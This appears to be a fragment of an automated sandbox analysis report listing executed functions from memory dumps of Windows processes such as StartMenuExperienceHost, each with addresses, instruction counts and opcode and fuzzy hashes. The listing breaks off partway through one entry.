                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a356a445c7444da277418655de0d64a20d14b7fd259fe8e1dcec3ab04cc465c1
                                                          • Instruction ID: 40b2424d629d52a5a1b661e9f1945f0f4cbe76ec9a5c50cdff945eeebb00e634
                                                          • Opcode Fuzzy Hash: a356a445c7444da277418655de0d64a20d14b7fd259fe8e1dcec3ab04cc465c1
                                                          • Instruction Fuzzy Hash: 2AB09226E1A31D8AE32892A0C4A02FE31520F54310F5AC6B2900F264F59C282B85A682

                                                          Executed Functions

                                                          Function 00007FFD9B760D47 Relevance: 1.5, Strings: 1, Instructions: 262COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b760000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 5[_H
                                                          • API String ID: 0-3279724263
                                                          • Opcode ID: c1537ccfc4ef4853b2070f1b8a0a8cfc6deee2af4b399e1d880cdd69493ba448
                                                          • Instruction ID: 041b4791db096472e0875d719b480a338a9b8e08a8709b79e21e5cb7824646e5
                                                          • Opcode Fuzzy Hash: c1537ccfc4ef4853b2070f1b8a0a8cfc6deee2af4b399e1d880cdd69493ba448
                                                          • Instruction Fuzzy Hash: 16910375A19A9D8FE759DF6888757A97FE0FB95300F0101BED04AC72EADE781810C701
                                                          Function 00007FFD9B791998 Relevance: .4, Instructions: 438COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4df64d77c1c8581198285e37ca6c968cfe3d030cc5d8bd5f267c4f16553fffe8
                                                          • Instruction ID: b17fbcfb5e9a66241a5effc44166e5079fc88def521510cdb7c5c2a1b70e5b4c
                                                          • Opcode Fuzzy Hash: 4df64d77c1c8581198285e37ca6c968cfe3d030cc5d8bd5f267c4f16553fffe8
                                                          • Instruction Fuzzy Hash: FDB1AC35A2E75E07E32D49694C930B57395EB92306B2A837CCDEB838E7DD18B52342C1
                                                          Function 00007FFD9B76116D Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b760000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: H
                                                          • API String ID: 0-2852464175
                                                          • Opcode ID: 7640433f34eede566c812450094a6e69065d10b1c13dc11ac318c3c9c80250e4
                                                          • Instruction ID: b35dabdd73c7da43c11811cfdbf83e34339d1e92968b201d155f4876d4635a3b
                                                          • Opcode Fuzzy Hash: 7640433f34eede566c812450094a6e69065d10b1c13dc11ac318c3c9c80250e4
                                                          • Instruction Fuzzy Hash: C4317530A0964E8FDB49EBA4C868EBD77F0FF59300F0546BAD00AD71B6DA38A544C751
                                                          Function 00007FFD9B791311 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: M
                                                          • API String ID: 0-3664761504
                                                          • Opcode ID: f12c0a075ec27cfbf5fef80b8620e91a67aa2f93c00d3bf6be23cb0d9f5c98cd
                                                          • Instruction ID: 183ec4e01b1e37abc7825f8b17b69fe653e45be46e7cbd0f7b237246f925c800
                                                          • Opcode Fuzzy Hash: f12c0a075ec27cfbf5fef80b8620e91a67aa2f93c00d3bf6be23cb0d9f5c98cd
                                                          • Instruction Fuzzy Hash: F301AD60A4F3C51FDB13A7794829414BFB0EE2720034A02EFC086CF5B3D91D498AC702
                                                          Function 00007FFD9B79A949 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: M
                                                          • API String ID: 0-3664761504
                                                          • Opcode ID: 2c527e1d9c0e6d52423112981ac464d116d1382743bfd84b1ed4f50b27f9ea42
                                                          • Instruction ID: 50b7503b6ec1246df5541ed247b2786542c01a9767911684e283345212366f3f
                                                          • Opcode Fuzzy Hash: 2c527e1d9c0e6d52423112981ac464d116d1382743bfd84b1ed4f50b27f9ea42
                                                          • Instruction Fuzzy Hash: 22F06561A0F7C44FCB1A9A7488694547FA0EF6721174A52EFC445CF1A3EA1D9885C711
                                                          Function 00007FFD9B7912A9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: M
                                                          • API String ID: 0-3664761504
                                                          • Opcode ID: 7bd68e51fb2e6f9cfb95b9e5e53aea50fab733c3c41e411c04606f8199004131
                                                          • Instruction ID: b40802a4a57691287cffb446406ad976357db3b0b6b90848e9474288c9d378c8
                                                          • Opcode Fuzzy Hash: 7bd68e51fb2e6f9cfb95b9e5e53aea50fab733c3c41e411c04606f8199004131
                                                          • Instruction Fuzzy Hash: 90E09271A4F7C44FCB16EA348869454BFA0EF6720174A52EFC086CF5A3EA2DC889C701
                                                          Function 00007FFD9B785F19 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B784000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b784000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: M
                                                          • API String ID: 0-3664761504
                                                          • Opcode ID: 8d8d457057586edaa3f3a09520b88bf4bcc9746fd14da102a81c1ad234e5a81b
                                                          • Instruction ID: 5e0221d51b13db0f3fdb757e39155dbea25aaeb0af3b98e21f17e926daad2716
                                                          • Opcode Fuzzy Hash: 8d8d457057586edaa3f3a09520b88bf4bcc9746fd14da102a81c1ad234e5a81b
                                                          • Instruction Fuzzy Hash: 72E09B7160E7C44FC716D7344869454BFA0EF6721174A45EEC086CF1A7DA2DC885CB01
                                                          Function 00007FFD9B79AF19 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: I
                                                          • API String ID: 0-3707901625
                                                          • Opcode ID: ed299b62728f3847367148c1fb24ccc546231eec544961699d3004de9db2fef6
                                                          • Instruction ID: 8cd8ab4dadf664225cd20ee715cbc7d3f5c641927203da29c304c080838b3de1
                                                          • Opcode Fuzzy Hash: ed299b62728f3847367148c1fb24ccc546231eec544961699d3004de9db2fef6
                                                          • Instruction Fuzzy Hash: 19E01A6194F3C45FCB5AAB74887A8443FA0EE6B21078B41EEC089CF5B3E62D9949C701
                                                          Function 00007FFD9B786DF5 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B784000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b784000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: V
                                                          • API String ID: 0-1342839628
                                                          • Opcode ID: 8ff6170bfc00ded071552b819af9ad04e304f33f11e510be431c6c09e4be9d2f
                                                          • Instruction ID: 460ba21d971b45360204ad46af60fac19f9ae869c52dbe30bb146aae283d1bcc
                                                          • Opcode Fuzzy Hash: 8ff6170bfc00ded071552b819af9ad04e304f33f11e510be431c6c09e4be9d2f
                                                          • Instruction Fuzzy Hash: 0FE0C210A2E7970FE326637418600E87B609F4660078A01F6D448CE0E3D84D098643D3
                                                          Function 00007FFD9B7925B9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: I
                                                          • API String ID: 0-3707901625
                                                          • Opcode ID: 272c6c2c47a8360e666b875b46ea72ae7de09cef4e002903099fd3742095893f
                                                          • Instruction ID: 1bb6b64e9681585670e723d8bf27ecff32eaf032831eba9f54921cc459e18318
                                                          • Opcode Fuzzy Hash: 272c6c2c47a8360e666b875b46ea72ae7de09cef4e002903099fd3742095893f
                                                          • Instruction Fuzzy Hash: ADE01A6154E3C48FCB06EB7488698553F70AE6721078B41DED049CF1B3E62D8A49CB01
                                                          Function 00007FFD9B7897E9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B784000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b784000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: I
                                                          • API String ID: 0-3707901625
                                                          • Opcode ID: d4a9066e90e29e43fb23130c2b374d38154cdaae4fa6d731389d5539c282ff6a
                                                          • Instruction ID: c070582c185fe029ab4e027ed204f63b3dbf8541ba8d5b261cc9ee5c41427e78
                                                          • Opcode Fuzzy Hash: d4a9066e90e29e43fb23130c2b374d38154cdaae4fa6d731389d5539c282ff6a
                                                          • Instruction Fuzzy Hash: 88E09A7194F7C44FCB06EB7488A98047FA0AF2720078B00EEC085CF0B3E62D8848C701
                                                          Function 00007FFD9B789999 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B784000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b784000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: I
                                                          • API String ID: 0-3707901625
                                                          • Opcode ID: 3d972ce09f3ed6c7852a33420eef1defb77debc4615dc417ebcfe6d2c6c695c8
                                                          • Instruction ID: 0cd8743d9b17d8eac5fda8a8b4ae23438b8d7c090cd5d09a2f178359511b3836
                                                          • Opcode Fuzzy Hash: 3d972ce09f3ed6c7852a33420eef1defb77debc4615dc417ebcfe6d2c6c695c8
                                                          • Instruction Fuzzy Hash: 79E0BF7154A3C44FCB16EB7488699957FB0EE6721178B41EEC149CF1B3E62D894AC701
                                                          Function 00007FFD9B771648 Relevance: .9, Instructions: 915COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f5bacf262bb28bbed45a2d9e803ee77cbf770395535c24d2dd21a48196f195cd
                                                          • Instruction ID: bda20743a556cb88c0d29de0bc1dd294ad50b959980b72b515b8ef4dc64a1234
                                                          • Opcode Fuzzy Hash: f5bacf262bb28bbed45a2d9e803ee77cbf770395535c24d2dd21a48196f195cd
                                                          • Instruction Fuzzy Hash: 6F52B771B19A4E8FEBA8EB5884A16B873E2FF54340F1506B9D01EC36E7DD24BD418781
                                                          Function 00007FFD9B79D380 Relevance: .9, Instructions: 854COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7b8c873ec0d4bb8cdf569eca7b111d06ef1bc4cafc868eae3d22b58df577dc32
                                                          • Instruction ID: 187f0f01c116434b538f3693ddf4b2e8846788cccb28e3504a30f683510cdc26
                                                          • Opcode Fuzzy Hash: 7b8c873ec0d4bb8cdf569eca7b111d06ef1bc4cafc868eae3d22b58df577dc32
                                                          • Instruction Fuzzy Hash: D321C81BB0F2A64AEB2576BD68B14F93B50DF5123670843F3E19C8E0F3DD0C224A8661
                                                          Function 00007FFD9B770DD6 Relevance: .7, Instructions: 747COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f01817892d6a5ccb5d38406767ac44ff4d9303108abe3a358607b7d1390756d9
                                                          • Instruction ID: e7f50afd7f40b515586e252631dc2bd9d38881968c76399f3d8e19b96769b633
                                                          • Opcode Fuzzy Hash: f01817892d6a5ccb5d38406767ac44ff4d9303108abe3a358607b7d1390756d9
                                                          • Instruction Fuzzy Hash: ED42B631B19A5E8FEBA8EB5884A17B8B3D2FF54340F1506B9D00DC36A6DD74BD818781
                                                          Function 00007FFD9B771A4E Relevance: .4, Instructions: 411COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 784bc1d62a2294a58b7724992b297eb6a7d7e1a5533f7cb1521469a15e370e60
                                                          • Instruction ID: fbad1d1b8fb4e8153a9310d9f11c944ae695e8512388d2216e39aa239ddd70ab
                                                          • Opcode Fuzzy Hash: 784bc1d62a2294a58b7724992b297eb6a7d7e1a5533f7cb1521469a15e370e60
                                                          • Instruction Fuzzy Hash: FBD1B771B19A4E8FEBA8EB5884A56B8B3E2FF54300F0506B9D05EC35F7DD24B9818741
                                                          Function 00007FFD9B7711CD Relevance: .4, Instructions: 403COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d5f8fd58300f98e20d65fd869d3982262edc6068dcac4b9fd673ea0f4e785623
                                                          • Instruction ID: e6df6a37a6f5979371697eb9883c830f2d580e4bf0101fc2e7e1aadf7931a19c
                                                          • Opcode Fuzzy Hash: d5f8fd58300f98e20d65fd869d3982262edc6068dcac4b9fd673ea0f4e785623
                                                          • Instruction Fuzzy Hash: 0AD1B521B1AA1D8FEBB8EA6C84A577473E2EF54300F160675D40EC76F2EE64BE418741
                                                          Function 00007FFD9B7899D1 Relevance: .3, Instructions: 308COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B784000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b784000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7cdb55a65ebf945ea101fff56e12060bf82f12bfa70f9342aab7441cfee44d77
                                                          • Instruction ID: 770135fa87908cc2157e37519ecc7a7ef915118de0911bd369f760935f6eaa82
                                                          • Opcode Fuzzy Hash: 7cdb55a65ebf945ea101fff56e12060bf82f12bfa70f9342aab7441cfee44d77
                                                          • Instruction Fuzzy Hash: 14A1B530B1990D8FDB59EB68C4A56B977E1FF98304F5106B9D01DC72E6CE35A841C741
                                                          Function 00007FFD9B793C75 Relevance: .3, Instructions: 293COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 52dbc424bcf5a1b53e07db848469634e56b54a47c9cd5c24c828d0f071fda416
                                                          • Instruction ID: 7e1c72cbcb8c8b32435c55f8161925136da55f3e939f9b00dffe6c63c2b62982
                                                          • Opcode Fuzzy Hash: 52dbc424bcf5a1b53e07db848469634e56b54a47c9cd5c24c828d0f071fda416
                                                          • Instruction Fuzzy Hash: DF91F761B1DA4E4FEB9CEB6844766B873D2EF94300F0642BAD40DC72E7DD286D458391
                                                          Function 00007FFD9B798CC5 Relevance: .1, Instructions: 148COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a6755adddaa974778a3aae450c62f0a2a89adda7cdaca49eaa5de5703b7239d5
                                                          • Instruction ID: 77877d4cafe5aebf82ce93a1e9d2e99f32dbc945c768e36a3ad20d69a0bc078f
                                                          • Opcode Fuzzy Hash: a6755adddaa974778a3aae450c62f0a2a89adda7cdaca49eaa5de5703b7239d5
                                                          • Instruction Fuzzy Hash: 7C515670A19A5D8FEB94EF98C865BACB7E1FF64340F1042B5D01DD32A6DE3469848B41
                                                          Function 00007FFD9B760908 Relevance: .1, Instructions: 118COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b760000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                          • Instruction ID: 316e101ef78cfc286dd9bf9213776a60613c7b2364f351c9a1e9e6bd985e6ad7
                                                          • Opcode Fuzzy Hash: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                          • Instruction Fuzzy Hash: 6F21EA3130DD184FE768EA5CE889EB977D1EF9932171501BAE58EC7135E911EC8287C2
                                                          Function 00007FFD9B7929B0 Relevance: .1, Instructions: 98COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0358d6e6cacc842da14736ccc07cd7c96de2dea8a1aae4d73eed5bf434006a73
                                                          • Instruction ID: 80613281f7435ad72fa67de18c6628edbd569af8bb4f871f47184264f9f48c97
                                                          • Opcode Fuzzy Hash: 0358d6e6cacc842da14736ccc07cd7c96de2dea8a1aae4d73eed5bf434006a73
                                                          • Instruction Fuzzy Hash: 2A31F52270EB8E4EE76EBBA848B56F87791EF45310F0902BAD41CC61F3CC2869848341
                                                          Function 00007FFD9B760998 Relevance: .1, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b760000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 572dfdccc02d0be25738555a17487ba7f95a4c2caad80aaf73cac539ed4f751e
                                                          • Instruction ID: 1e61029adf885191d111f5cc8d2d3b0d4207ec7aa9f8c0afe56fde41c7dfcc98
                                                          • Opcode Fuzzy Hash: 572dfdccc02d0be25738555a17487ba7f95a4c2caad80aaf73cac539ed4f751e
                                                          • Instruction Fuzzy Hash: 7E21FB20F1DA5D8FE758A66C946EAB977C2EB98311F4201B9E40EC33F7DD14AC418386
                                                          Function 00007FFD9B792AE2 Relevance: .1, Instructions: 93COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b94067b00aff5bc069c399aff888473ec1378993bd8a8c98f4389208d925f83a
                                                          • Instruction ID: d7c00ecddfcfa81814668e40f3bd0d639e3310acbc94f947bc33cdf8a2e64130
                                                          • Opcode Fuzzy Hash: b94067b00aff5bc069c399aff888473ec1378993bd8a8c98f4389208d925f83a
                                                          • Instruction Fuzzy Hash: 4A31B821B0EB8E4FF7ADABE448A56B97AD1EF55300F4502BAD80DC21F3DD2879448341
                                                          Function 00007FFD9B79D2D0 Relevance: .1, Instructions: 84COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1463f7d863d6c09880f4c78f2cdbd477d3d10162c7f98ca30cfb06da01a0c2ef
                                                          • Instruction ID: fc5e30150f603e23b9573e26c74c2cf3865218c3e621c5be558d629b5465ac4d
                                                          • Opcode Fuzzy Hash: 1463f7d863d6c09880f4c78f2cdbd477d3d10162c7f98ca30cfb06da01a0c2ef
                                                          • Instruction Fuzzy Hash: E121A732F08A1D8BEB65DA5CD8647E977A1EBD4310F060276D419D72A4DE386D418B90
                                                          Function 00007FFD9B760C25 Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b760000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c0756a0fcb24f1ac4abdcf14adf32f3035b087ea39d5c497d12fbeee13297120
                                                          • Instruction ID: 768f8119e719515f6c73819efde9d59b7e05b509f6a8146a4feda0dd235cdd80
                                                          • Opcode Fuzzy Hash: c0756a0fcb24f1ac4abdcf14adf32f3035b087ea39d5c497d12fbeee13297120
                                                          • Instruction Fuzzy Hash: 8E21A735A0D78DCFE7229BA484A52EC7FA0EF41310F1646BBD045DB1E6EA342A498742
                                                          Function 00007FFD9B7741B1 Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 49eae4b34e81e09fb8b2d12c3543f9f2a8401850745d0ddc12868301eda8de17
                                                          • Instruction ID: 853ab74b9c086f4fc73123dbd8b2cdbab67f47f63ac5d474d84fea2ee9407d94
                                                          • Opcode Fuzzy Hash: 49eae4b34e81e09fb8b2d12c3543f9f2a8401850745d0ddc12868301eda8de17
                                                          • Instruction Fuzzy Hash: BD218270E1965E8EEB649BA4C8656BE7BB1FF50300F01067EC016D72E6DF786A018B40
                                                          Function 00007FFD9B764C28 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b760000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 70ec809df8753c88d0a71ad22cfb0f6d31bd0d67752d974cdb032d1a8d59c643
                                                          • Instruction ID: 1dbbf18fa1e366e9070df38494e331f83b6631a81480d706dda4767c6e320f90
                                                          • Opcode Fuzzy Hash: 70ec809df8753c88d0a71ad22cfb0f6d31bd0d67752d974cdb032d1a8d59c643
                                                          • Instruction Fuzzy Hash: 89215021F19A1D8FE7B4E75884B56B87392FF84310F1602BAE40DD76F6EE286E414642
                                                          Function 00007FFD9B792CA5 Relevance: .1, Instructions: 67COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5c453e43267755cd7569c7a1ac1dbff5958a18778a1ba7ea93fd71c764d0d247
                                                          • Instruction ID: d6a9b087a721ce4fc41482c5e4881b593dc99fc0d5dec6fc0a3347c44bc19aa2
                                                          • Opcode Fuzzy Hash: 5c453e43267755cd7569c7a1ac1dbff5958a18778a1ba7ea93fd71c764d0d247
                                                          • Instruction Fuzzy Hash: 9E21C635B0D91E8FE7A9EB88C4647B873A1FB55310F050679D41DD72E5CD287D408781
                                                          Function 00007FFD9B762BF9 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
